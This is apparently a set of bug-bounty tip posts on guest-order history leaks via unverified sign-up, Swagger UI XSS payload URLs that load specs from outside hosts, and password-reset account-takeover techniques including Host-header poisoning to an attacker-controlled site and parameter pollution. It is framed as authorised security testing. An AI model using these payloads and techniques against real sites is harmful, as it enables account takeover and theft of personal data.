Farhan

Bug Bounty Tips: 🐛💰 Here's a simple bug bounty tip for shopping site targets that can earn you some serious $$$$. I've stumbled upon 10+ similar issues on shopping sites that allow guest checkouts 🛒. Many overlook these issues because they require placing an order 📦. However, some services support cash on delivery 💸 or allow you to place a cheap order and then cancel it for a refund 🔄, making it worth adding to your checklist if other prerequisites are met. Here's what to look for: 1️⃣ Target app that permits guest orders without creating an account 🕵️‍♂️ 2️⃣ Target app doesn't require email verification for new account creation, or you've found an email verification bypass on sign-up 📧🔓 If these prerequisites are met, you can often find target apps with a misconfiguration that lets you access a guest user's order history by creating a new account with the same email used for the guest order. Here's how it usually goes down: 1️⃣ Place an order on the site as a "Guest" and use the victim's email during checkout, e.g., [email protected] 📩 2️⃣ The victim receives an email with the receipt 📧 3️⃣ As an attacker, sign up using the email [email protected] assuming there's no email verification 🧑‍💻 4️⃣ Navigate to the account's order history page, and you might strike gold 🪙 by finding the previously made orders, leading to Order History and PII leaks 🔍📜 Takeaways: Don't ignore workflows involving payments; you might discover workarounds like cheap payments or cash on delivery 💡💳. Test for unusual flows and be ready for pleasant surprises with some lucrative bounties 💰💎 #BugBounty #CyberSecurity #HackerOne #BugBountyTips #SecurityTips #Bounties #infosecurity

Quick Wins: If you come across an outdated Swagger instance, always remember to test for XSS vulnerabilities. Try these payloads and earn some quick bounties! http://example(.)com/swagger-ui/index.html?configUrl=https://jumpy-floor.surge(.)sh/test.json http://example(.)com/swagger-ui/index.html?url=https://jumpy-floor.surge(.)sh/test.yaml http://example(.)com/swagger-ui/index.html?configUrl=https://xss.smarpo(.)com/test.json&url=https://jumpy-floor.surge(.)sh/test.yaml Always try escalating these Issues to an Account takeover to earn a 'High' severity payout. #EthicalHacking #BugBounty #SecurityTips #Cybersecurity #StaySecure

🤔Question of the day: What are the common vulnerabilities within the "Forgot Password" functionality? Many users tend to overlook testing the "Forgot Password" feature of a target app. However, these functions are often susceptible to various issues. If exploited, these issues can lead to an account takeover, yielding bounties ranging from $750 to $7500, depending on the program. Here are the common issues you should be on the lookout for: 1️⃣ Token and username parameter: Some target apps often generate a password reset link containing a token and a username parameter. In such cases, request a password reset link on your attacker account, navigate to it, and attempt to replace the "username" parameter with the victim's username. Try resetting the password using your token. This is frequently one of the most common issues I've encountered that leads to an Account Takeover (ATO). 2️⃣ Password reset poisoning: Request a password reset using the victim's account and alter the "Host" header of the request to https://attackercontrolledsite(.)com. If the target app is vulnerable, this will trigger an email to the victim with a password link pointing to your server (e.g., https://attackercontrolledsite(.)com?token=dsksdjsdjsdjdsjdsjsd. When the victim clicks on this link, you will receive the password reset token, paving the way for an ATO. 3️⃣ HTTP Parameter Pollution: When requesting a password reset, always attempt to pass multiple email parameters (e.g., email=victim@target(.)com&email=attacker@target(.)com). Depending on how the application's backend is set up, it may have different routines running on various servers to check validity and send emails. Consequently, it could inadvertently send the password reset link of victim@target(.)com to attacker@target(.)com. 4️⃣ None of the above worked? Fret not! We have many more scenarios that can be exploited, and we'll discuss them in our future tweets. Takeaways: Never underestimate the importance of the password reset functionality, as issues in these areas can lead to lucrative payouts. Be creative and make sure to add these items to your checklist. #CyberSecurityTips #SecurityTips #BugBountyTips #InfoSec #HackerOne #BugCrowd #portswigger #burpsuite